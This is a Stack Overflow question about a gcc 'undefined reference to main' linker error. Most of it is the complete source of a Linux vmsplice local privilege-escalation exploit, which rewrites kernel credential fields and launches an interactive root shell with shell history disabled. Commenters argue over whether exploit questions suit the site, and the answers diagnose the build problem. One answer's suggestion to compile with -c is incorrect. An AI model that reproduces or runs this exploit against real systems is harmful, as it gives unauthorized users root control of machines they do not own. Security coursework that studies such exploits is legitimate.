# Undefined reference to ''main" in a C program

Tags: c

I have read the other answers on this topic, and unfortunately they have not helped me.
I'm trying to compile a C program on my pc, but the compiler get me the following error:

> /usr/lib/gcc/x86_64-redhat-linux/4.1.2/../../../../lib64/crt1.o: In function `_start':
>   (.text+0x20): undefined reference to`main'
>   collect2: ld returned 1 exit status

Although the program has a main.
The code is an exploit that I try to run on my pc for an exam:

```
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS    16
#define PG_compound 14
#define uint        unsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)    (x + sizeof(x) - 40)

struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
    printf(err ? "[-] %s: %s " : "[-] %s ", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS     0x73
#define USER_SS     0x7b
#define USER_FL     0x246

static_inline
void exit_kernel()
{
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"
    "movl %1, 0x0c(%%esp) ;"
    "movl %2, 0x08(%%esp) ;"
    "movl %3, 0x04(%%esp) ;"
    "movl %4, 0x00(%%esp) ;"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

static_inline
void * get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"
    "movl (%%eax), %0"
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS     0x23
#define USER_SS     0x2b
#define USER_FL     0x246

static_inline
void exit_kernel()
{
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"
    "movq %1, 0x18(%%rsp) ;"
    "movq %2, 0x10(%%rsp) ;"
    "movq %3, 0x08(%%rsp) ;"
    "movq %4, 0x00(%%rsp) ;"
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

static_inline
void * get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
    int i;
    uint    *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }   

    exit_kernel();
}

void exit_code()
{
    if (getuid() != 0)
        die("wtf", 0);

    printf("[+] root ");
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", NULL);
    die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
    int     pi[2];
    size_t      map_size;
    char *      map_addr;
    struct iovec    iov;
    struct page *   pages[5];

    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);

    printf("-----------------------------------");
    printf(" Linux vmsplice Local Root Exploit");
    printf(" By qaaz");
    printf("-----------------------------------");

    if (!uid || !gid)
        die("!@#$", 0);

    /*****/
    pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
    pages[1] = pages[0] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx ", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx ", pages[0]);
    printf("[+] page: 0x%lx ", pages[1]);

    pages[0]->flags    = 1 << PG_compound;
    pages[0]->private  = (unsigned long) pages[0];
    pages[0]->count    = 1;
    pages[1]->lru.next = (long) kernel_code;

    /*****/
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx ", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx ", pages[2]);
    printf("[+] page: 0x%lx ", pages[3]);

    pages[2]->flags    = 1 << PG_compound;
    pages[2]->private  = (unsigned long) pages[2];
    pages[2]->count    = 1;
    pages[3]->lru.next = (long) kernel_code;

    /*****/
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx ", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx ", pages[4]);

    /*****/
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx ", map_addr, map_addr + map_size);

    /*****/
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
        die("munmap", errno);

    /*****/
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);

    iov.iov_base = map_addr;
    iov.iov_len  = ULONG_MAX;

    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);
    return 0;
}
```

Thanks in advance.

---

this is the output of command: gcc exploit.c -o exploit

```
 Using built-in specs.
    Target: x86_64-redhat-linux
    Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-libgcj-multifile --enable-languages=c,c++,objc,obj-c++,java,fortran,ada --enable-java-awt=gtk --disable-dssi --disable-plugin --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --with-cpu=generic --host=x86_64-redhat-linux
    Thread model: posix
    gcc version 4.1.2 20080704 (Red Hat 4.1.2-54)
     /usr/libexec/gcc/x86_64-redhat-linux/4.1.2/cc1 -quiet -v /usr/local/Plone/zinstance/var/exploit.c -quiet -dumpbase exploit.c -mtune=generic -auxbase exploit -version -o /tmp/cclLsvN1.s
    ignoring nonexistent directory "/usr/lib/gcc/x86_64-redhat-linux/4.1.2/../../../../x86_64-redhat-linux/include"
    #include "..." search starts here:
    #include <...> search starts here:
     /usr/local/include
     /usr/lib/gcc/x86_64-redhat-linux/4.1.2/include
     /usr/include
    End of search list.
    GNU C version 4.1.2 20080704 (Red Hat 4.1.2-54) (x86_64-redhat-linux)
            compiled by GNU C version 4.1.2 20080704 (Red Hat 4.1.2-54).
    GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
    Compiler executable checksum: d9259db5918a1d4098c2a59efd7b40ce
    /usr/local/Plone/zinstance/var/exploit.c:1:20: warning: missing whitespace after the macro name
     as -V -Qy -o /tmp/ccsCgguR.o /tmp/cclLsvN1.s
    GNU assembler version 2.17.50.0.6-26.el5 (x86_64-redhat-linux) using BFD version 2.17.50.0.6-26.el5 20061020
     /usr/libexec/gcc/x86_64-redhat-linux/4.1.2/collect2 --eh-frame-hdr -m elf_x86_64 --hash-style=gnu -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o /usr/local/Plone/zinstance/var/exploit /usr/lib/gcc/x86_64-redhat-linux/4.1.2/../../../../lib64/crt1.o /usr/lib/gcc/x86_64-redhat-linux/4.1.2/../../../../lib64/crti.o /usr/lib/gcc/x86_64-redhat-linux/4.1.2/crtbegin.o -L/usr/lib/gcc/x86_64-redhat-linux/4.1.2 -L/usr/lib/gcc/x86_64-redhat-linux/4.1.2 -L/usr/lib/gcc/x86_64-redhat-linux/4.1.2/../../../../lib64 -L/lib/../lib64 -L/usr/lib/../lib64 /tmp/ccsCgguR.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/x86_64-redhat-linux/4.1.2/crtend.o /usr/lib/gcc/x86_64-redhat-linux/4.1.2/../../../../lib64/crtn.o
    /usr/lib/gcc/x86_64-redhat-linux/4.1.2/../../../../lib64/crt1.o: In function `_start':
    (.text+0x20): undefined reference to `main'
    collect2: ld returned 1 exit status
```

Thanks!

Comment: Please post the full command you used to compile. Also the output of `gcc -E` may be of help.

Comment: This question appears to be off-topic because of 'The code is an exploit' - strong smell of malware development.

Comment: Try making a *minimal* example. Delete everything you can while still being able to reproduce the problem. @MartinJames: While it *might* be malware development, I've certainly had (legitimate) courses in university that required us to write exploits (to help facilitate teaching subjects on ASM, stacks, OSes, etc).

Comment: @MartinJames “This question appears to be off-topic because … development”? Development is very much on-topic here: that's what [so] is about. Exploits aren't off-topic. What's next? “This question appears to be off-topic because I don't like Java”?

Comment: @MartinJames If you don't know how malware works, you cannot defend against it. Any computer security course worth its salt teaches you how to write at least a couple of basic exploits.

Comment: Welcome to SO. Your question looks a little bit off track to me. Writing such sophisticated code and not knowing where to look for when you encounter such a basic linker error don't go well together. You should perhaps concentrate on more basic programming tasks before you start kernel hacking?

Comment: @Gilles - a large proportion of my available CPU is spent on AV software. I will attempt to close any question where there is any suspicion of malware intent.  Others may hold different views, fine.

Comment: @Cornstalks - there may indeed be no malware intent.  Do you want to risk YOUR house on it?  No lawyers or TLA's are ever going to be knocking on my door.

Comment: @MartinJames Closing is determined by community guidelines, discussed on [metase]. It is not up to you to decide that you don't like certain kinds of software. You are perfectly free to downvote. However, it would be downright silly to reject questions from people who try to understand how malware works: they are the people who could make it so you don't need to run AV software.

Comment: @MartinJames: There very well could be malware intent here, as this certainly isn't something the OP wrote ([version 1](http://www.exploit-db.com/exploits/5092/) and [version 2](http://www.exploit-db.com/exploits/5093/)) (despite the fact there are a few differences here in the OP's code, particularly whitespace and newlines; the OP isn't making any significant modifications to this exploit). That said though, I still think valuable things can be taught through exploits, so while I might approach this question with caution, I won't immediately disregard it.

Comment: Guido i used the command: gcc exploit.c -o exploit.

Comment: The exam is network security and exploit is on exploit-db. 
I do not know what it does exactly. For now, I just had to run it on my pc.

Comment: Good luck with this. That said,  I have no idea why it's not finding the main while compiling.

Answer (score 3):

You are not compiling the file you think you are compiling. This is evinced by two things:

- The linker complains `main` is not defined when it clearly is in the source shown.
- The warning message “/usr/local/Plone/zinstance/var/exploit.c:1:20: warning: missing whitespace after the macro name” does not match the source shown.

That warning message arises when a `#define` line contains another token after the macro name without an intervening space, such as:

```
#define foo,
```

The source you show does not contain such text on line 1.

Additionally, you show text that you report is the output of the command “gcc exploit.c -o exploit”, but gcc does not show that sort of text unless the “-v” option is used. So the output must have been obtained by a different command.

If you have the file open in an editor, you should save it, and you should check the filesystem path the editor is saving the file to.

Answer (score 0):

probably it's too late for a response.

using the -c flag should solve the problem